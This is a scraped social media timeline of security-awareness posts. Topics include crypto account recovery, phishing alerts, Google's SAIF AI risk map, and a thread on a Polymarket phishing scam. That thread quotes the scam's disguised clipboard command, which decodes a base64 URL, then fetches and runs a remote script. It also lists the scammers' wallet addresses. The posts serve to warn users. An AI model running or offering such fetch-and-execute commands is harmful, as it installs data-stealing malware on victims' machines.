Joined July 2025
- Tweets 56
- Following 10
- Followers 230
- Likes 39
10 Photos and videos
Jun 11
Looking for AI tools? Stay cautious.
Fake downloads and sponsored ads are being used to spread malware.
✅ Verify domains
✅ Avoid suspicious ads
✅ Don't run unknown commands
#CryptoSecurity #AISecurity #StaySecure
2
26
Tom retweeted
Feb 15
🚨 Hacked? Changing your password is NOT enough. 🚨
If your account is compromised, hackers often maintain access through session tokens, 2FA keys, or cloned Passkeys. A simple password reset won't stop them.
The "Reset Everything" Protocol:
🔐 New Password: Use a unique, 12 character mix.
🛡️ Re-bind 2FA: Delete old keys and start fresh.
🔑 Revoke Passkeys: Delete old ones and recreate.
🚫 Clear Sessions: Force logout from ALL devices.
The faster you act, the less the damage. Don't leave the door cracked!
📖 Full Recovery Guide:
🔗kucoin.com/learn/kucoin-guid…
#SecuritySunday #KuCoin #StaySecure #CryptoSafety
28
56
121
9,822
Jan 12
One thing I like about Google’s SAIF Risk Map: it frames AI risk as a lifecycle problem, not just a model problem.
Jan 4
一定要看代码,自从我们捉到几只“摧枯拉朽”的虫子后,对 AI 这玩意就始终保持警惕(当然,玩安全的人本就一直很警惕…
对 AI 安全风险感兴趣的可以看 Google 的这个 SAIF Map:
saif.google/secure-ai-framew…
整理的很良心,强烈推荐!
8
2
28
8,450
Jan 12
And critically, it doesn’t stop at deployment:
• Runtime → prompt injection, sensitive data disclosure, rogue actions
• Monitoring → abuse detection, drift, and incident response
1
70
Jan 12
The lesson: AI systems need end-to-end security ownership, not point solutions.
The SAIF Risk Map is worth studying:
🔗 saif.google/secure-ai-framew…
63
Tom retweeted
Jan 11
🎣 PHISHING ALERT: Don't take the bait! ❌
Hackers are constantly evolving, using fake links, emails, calls, and social media to trick you into revealing sensitive info. Protect your crypto!
Stay safe with these 3 essential steps:
1️⃣ ALWAYS verify URLs: Manually type kucoin.com/cert or use the official app.
2️⃣ NEVER click suspicious links or share passwords/private keys.
3️⃣ ENABLE your Anti-Phishing Code & verify all "official" contacts via KuCoin's official channels.
Read the full guide: kucoin.com/learn/kucoin-guid…
#SecuritySunday #KuCoin #CryptoSafety #StayAlert #StaySecure
57
10
71
10,223
17 Dec 2025
A new campaign is using fake ChatGPT sessions in Google Ads to deliver AMOS InfoStealer on Macs.
🚨As a reminder for all teams: never run terminal commands from unverified sources—awareness is your first line of defense. 👊
malwarebytes.com/blog/news/2…
3
5
26
7,089
9 Dec 2025
What is your Safety Score? 🛡️
8 Dec 2025
🔒 Secure More. Earn More. Win $500 USDT!
Boost your Safety Score by completing:
• Bind Passkey
• Google 2FA
• Security Code
Join the Giveaway:
👉 Follow @kucoincom
👉 Like, RT & drop your score in comments
👉 Submit here: gleam.io/lbdgd/secure-more-e…
🎁 50 users win $500 USDT!
Find your Safety Score: gleam.io/lbdgd/secure-more-e…
Tap Profile → Click Safeguard → Check & upgrade
91
3 Dec 2025
1/ A recent ransomware case highlights a recurring issue in our industry: shelf-ware. Security isn’t about how advanced the tools are — it’s about how well technology, people, and processes operate together.
1
1
2
383
3 Dec 2025
5/ Tools are only one part of the equation. Effective security requires technology skilled operators mature processes working in alignment.
Source: cybersecuritynews.com/destru…
1
45
3 Dec 2025
6/ What’s the biggest “shelf-ware” challenge you see in organizations today — tooling, staffing, or process maturity? Comment below👇
#Cybersecurity #Ransomware #Phishing #CryptoSecurity
1
47
28 Nov 2025
Our hearts are with those affected by the Tai Po fire. 🙏 Standing together with Hong Kong!
27 Nov 2025
Deep respect to Hong Kong’s firefighters who protected lives during the Tai Po fire. KuCoin has made a donation of HKD 2 million to support those who have been impacted — especially the families of the heroes who responded without hesitation.
We stand together with Hong Kong.
Details: kucoin.com/blog/en-kucoin-do…
1
3
175
20 Nov 2025
1/ 🚨 SECURITY ALERT: A sophisticated phishing scam is spreading in Polymarket comment threads. Over $500,000 has already been stolen. 🚨 Here is how the scam works:
People have lost more than $500,000 by being scammed through Polymarket comments. I am posting this to raise awareness of the growing issue.
They say: "Why are you not trading on Polymarket private markets? The odds are always much better on there!"
Here is how they try to steal your money:
They begin by buying both Yes and No shares for a market from two separate accounts - so their comments still appear when the 'Holders' filter is enabled - and then post a URL to their site in an obfuscated form.
On that site you're greeted by a clean-looking page with a Polymarket logo and are asked to log in via email. After you verify the email address (yes, they even send you a code), a new window pops up asking you to verify your activity - pretending to be Cloudflare:
But when you click 'Copy', something completely different gets copied:
curl -kfsSL $(echo 'ENCODED_STRING=='|base64 -d)|zsh
You should never paste a command you don't understand into your terminal!
The command first decodes the base64-encoded string (a server URL), then fetches a script from that server and immediately executes it. The script can contain anything, and there won't be any pop-up warning.
By now, it's probably too late - at this point, there's not much you can do except, with some luck, turning off Wi-Fi.
I won't go into detail about what the script does, but there is further obfuscation and additional scripts. In the end, they gather data, log everything on your system, and send a zip back to their server.
They then use this data to log into your accounts and steal your money.
They are very careful to hide everything, even after the initial obfuscation there is obfuscation at every step. I also noticed they shut down the server that sends payloads and receives logged data when there is no active victim.
Here are the scammers' wallet addresses:
DGiJqVHdygJ5wRivY9dMJB7TKTFZkoQ9VhhWRHBGtLKb
3hx7UWFABt9QoEKtqeWcDLvMRzbVXmrqHxEne6s7hXwN
They appear to switch wallets frequently and have likely already created new ones, but someone might still glean useful information from these addresses.
I think the best way to address this is to allow trusted users to review comments or to introduce a downvote system that hides heavily downvoted posts. The simple warning Polymarket currently displays won't be enough, but I'm confident they'll find a good solution.
6
6
36
17,228
20 Nov 2025
5/After “verifying,” a popup appears pretending to be Cloudflare, asking you to verify your activity. This step is engineered to trick you into running a malicious command or interacting with a spoofed verification flow that can compromise your wallet.
⚠️ Never paste commands into your terminal from unknown sources. One action can expose your keys and drain your funds.
1
154
20 Nov 2025
6/✅ How to stay safe:
• Only use the official Polymarket app/website
• Never log in through links in comments or DMs
• Never run commands you don’t fully understand
• Ignore anyone promoting “private markets,” “better odds,” or “exclusive access”
• When in doubt, navigate directly — not through a post or message Stay vigilant. Share this thread to protect others.
#Polymarket #Web3Security #Phishing #CryptoScam
121